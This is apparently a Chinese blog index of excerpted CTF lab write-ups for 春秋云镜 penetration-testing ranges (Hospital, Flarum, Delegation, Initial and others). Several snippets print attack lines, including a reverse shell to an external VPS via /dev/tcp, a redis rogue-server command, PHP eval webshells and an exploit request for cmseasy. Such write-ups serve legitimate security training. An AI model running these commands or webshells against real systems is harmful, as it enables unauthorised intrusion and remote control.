- 2024-10-09春秋云镜 Privilege
上来先用fscan扫一下.____/_\_______________||__//_\/____/__|/__|'__/_`|/__||////_\\_____\__\(__|||(_||(__|<\____/|___/\___|_|\__,_|\___|_|\_\
- 2024-09-27春旗云镜 Spoofing
扫描发现开放了8080端口dirsearch进行路径扫描.发现是Tomcat9.0.30,该版本存在文件包含漏洞tomcat的许多重要信息存储在/WEB-INF/web.xml下,然而不能直接访问,我们利用漏洞来读文件.python3ajpShooter.pyhttp://39.98.118.38:80808009/WEB-INF/web.xmlread结果如
- 2024-09-19春秋云镜 Hospital
扔fscan去扫一下heapdump泄露,然而不知道在哪下.dirsearch扫一下访问/actuator/heapdump去下载泄露文件直接用长城杯用的工具扫java-jarJDumpSpider-1.1-SNAPSHOT-full.jarheapdump得到key为GAYysgMQhG7/CzIJlVpR2g==,使用shiro综合利用去打弹个shellbash-c'{ech
- 2024-09-16春秋云镜 GreatWall
先扔fscan里扫一下发现开放了80端口和8080端口的web服务.访问8080端口发现是thinkphp框架真有洞!写个shell进去.然后使用蚁剑连接,在根目录找到了第一个flag.flag:flag01:flag{176f49b6-147f-4557-99ec-ba0a351e1ada}架个stowaway横向代理,然后传个fscan去扫内网../f
- 2024-09-07【内网渗透】最保姆级的春秋云镜Exchange打靶笔记
目录flag1flag2flag3 flag4flag1fscan扫外网访问8000端口->官方网站 Java代码审计之华夏ERPCMSv2.3|Drunkbaby'sBlogadmin/123456弱口令打/user/list?search=的jdbc+fj反序列化vps搭一个MySQL_Fake_Serverpayload:/user/list?search=%7b%20%22%6e%6
- 2024-09-04春秋云镜 Delivery
上来先扔fscan去扫一下发现开放ftp服务允许匿名登录.登录发现存在一个pom.xml文件,内容如下<?xmlversion="1.0"encoding="UTF-8"?><projectxmlns="http://maven.apache.org/POM/4.0.0"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- 2024-09-03春秋云镜-RCE靶场漏洞复现
CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行
- 2024-09-03春秋云镜 Exchange
使用fscan进行扫描得到是一个LumiaERP,开放了8000端口存在登录页面.利用网上漏洞进行信息泄露得到账号密码破解密码得到后台登录发现没有写马的地方.这里可以打一个JDBC(不懂java),去打cc6这条链子.在本地去起一个恶意的Mysql服务器,配合ysoserial-all.jar去打JDBC.注意
- 2024-09-02春秋云镜CVE-2022-28512
目录1:开启靶机访问2:根据提示确定目标点3:访问该路径/single.php,并且id传参发现单引号闭合4:访问该路径/single.php,并且id传参,发现十个字段1:开启靶机访问2:根据提示确定目标点3:访问该路径/single.php,并且id传参发现单引号闭合4:访问该路径/single.php,并且id传参,发现九
- 2024-09-02春秋云镜CVE-2022-28525(ED01-CMS v20180505 存在任意文件上传漏洞)
1:访问靶机发现是登录界面2:尝试使用弱口令爆破(明文传输)3:添加pyload并选择攻击类型字典我们随便选择的,实际情况需要实际定义爆破成功,用户名:admin密码:admin登录成功4:找到如图模块,上传图片马上传成功(上传时需要抓包改上传类型)5:使用蚁剑连接,拿到flag
- 2024-08-31春秋云镜 Flarum
访问发现是个FlarumCMS框架.使用rockyou.txt爆破administrator得到密码1chris,登录后台由于题目提示Flarum上执行任意命令,搜到了P牛的文章照着打反序列化.执行命令./phpggc-ptar-bMonolog/RCE6system"bash-c'bash-i>&/dev/tcp/123.57.23.40/11110>&1'"生成t
- 2024-08-25春秋云镜 网鼎杯2022半决赛
现用fscan扫一下访问发现是个wordpress,wpscan一下版本为6.2.6,使用了twentytwentyonetheme后台弱密码admin/123456登录由于存在themefileeditor,因此可以写马随便找一个php文件,写入木马.使用蚁剑连接,路径之前wpscan给出来了.得到了第一个flagflag:flag{c0af2d0
- 2024-08-22春秋云镜 Delegation
现用fscan扫一下入口机发现是cmseasy,在/admin路由处可以登录,弱密码admin123456这里存在CVE漏洞,写个马进去get:/index.php?case=template&act=save&admin_dir=admin&site=defaultpost:sid=#data_d_.._d_.._d_.._d_11.php&slen=693&scontent=<?php@eval($_POST[1]);?>
- 2024-08-20【内网渗透】最保姆级的春秋云镜initial打靶笔记
目录flag1flag2flag3 flag1外网thinkphp服务 随便找个工具梭连蚁剑读/root目录要提权suid没有可利用的提权命令,打sudo提权sudo-lmysql的sudo提权 Linux提权之Sudo70种提权方法-简单安全 查看文件名带flag的文件sudomysql-e'\!find/-typef-n
- 2024-08-20春秋云镜 Brute4Road
先用fscan扫一下内网尝试打redis主从python3redis-rogue-server.py--rhost39.98.122.75--lhost123.57.23.40需要在vps下使用,选择r,然后输入要反弹的ip,port使用pty获得交互式shellpython-c'importpty;pty.spawn("/bin/bash")'尝试UID提权find/-userroot-
- 2024-08-18春秋云镜 time
先用fscan扫一下,得到了下面的端口挨个尝试,访问7473发现是个neo4j的服务.这个neo4j的server只出现过这一个历史漏洞我们在网上下载jar漏洞利用文件,然后在本地运行.注意:一定是要java8,同时反弹shell的时候要使用编码防止传输中出现错误运行命令java-jar.\rhino_gadget
- 2024-08-15春秋云镜 tsclient
入口机给了个ip首先用fscan扫一下看看发现存在mysql远程登录,弱口令都扫出来了.使用MDUT进行远程登录登录以后上传cs马,选(s)这个.注意要上传到C:/Users/Public/,因为public文件夹通常有写的权限然后执行命令C:/Users/Public/beacon.exe回到cs中成功得到shell调整休眠时
- 2024-08-12春秋云镜CVE-2023-38836
打开靶场环境点击发现一个登陆框,弱口令试一下发现账号密码为admin,password随便点击点击Media发现这里可以上传文件上传木马试试<?php@eval($_POST["wjq"]);?>发现不能上传php文件php内容修改他的格式抓包绕过一下302就可以其实已经写进去了点一下4
- 2024-06-22[春秋云镜] Initial
[春秋云镜]Initial**整套网络环境拓扑:**一、打进内网开局一个ip:39.101.184.25,fscan扫一下存在thinkphp5.0.23的漏洞,可以rce,我们用工具检测下,然后上传webshell然后我们用蚁剑连一下,whoami看一下是www-data权限我们在www目录下搜一下flag,没
- 2024-03-29春秋云镜 CVE-2023-26469
靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。访问靶场链接查询CVE-2
- 2024-03-29春秋云镜 CVE-2023-27179
靶标介绍:GDideesCMSv3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于/_admin/imgdownload.php的filename参数进行利用。访问实验地址通过靶场介绍得知,漏洞通过位于/_admin/imgdownload.php的filename参数进行利用。构造访问目录。http://eci-2zeh4jwpx8
- 2024-03-21春秋云镜-Initial
春秋云镜-Initial谨以此篇,记录我初入渗透学习之路。中间有次我frp开多了,直接寄了,所以重新开过靶机,所以外网ip变了一次。冲了15块买三个沙砾,2个半小时独立完成了,虽然也很菜呃呃,第一次学渗透,啥配置都是现搜的wwwww首先fscan开扫:./fscan-h121.89.223.67找到开放的80端口,而
- 2024-01-10春秋云镜 Hospital WP
fscan先扫描39.101.178.126:22open39.101.178.126:8080open[*]aliveportslenis:2startvulscan[*]WebTitlehttp://39.101.178.126:8080code:302len:0title:None跳转url:http://39.101.178.126:8080/login;jsessionid=1B14C65F6F2FBDDB6219E0E9C43CCB61[*
- 2023-12-03投影式AI云镜——电梯演讲
投影式AI云镜——电梯演讲(软件技术基础第三次作业)这个作业属于哪个课程https://edu.cnblogs.com/campus/zjlg/23rjjsjc这个作业的目标是运用电梯演讲的方式向投资方介绍自己的创新产品姓名+学号陈佳华:2021330301002陈卉:2021330301001视频链接:投影式AI云镜
- 2023-11-24春秋云镜 Delegation WP
春秋云镜DelegationWP扫描39.99.129.120:21open39.99.129.120:22open39.99.129.120:80open39.99.129.120:3306open在url后面填上admin进入后台弱口令admin123456踩坑之路:在编辑模板处写马<?=system($_POST[1]);die()?>不能用常规的一句话木马,后面填上die()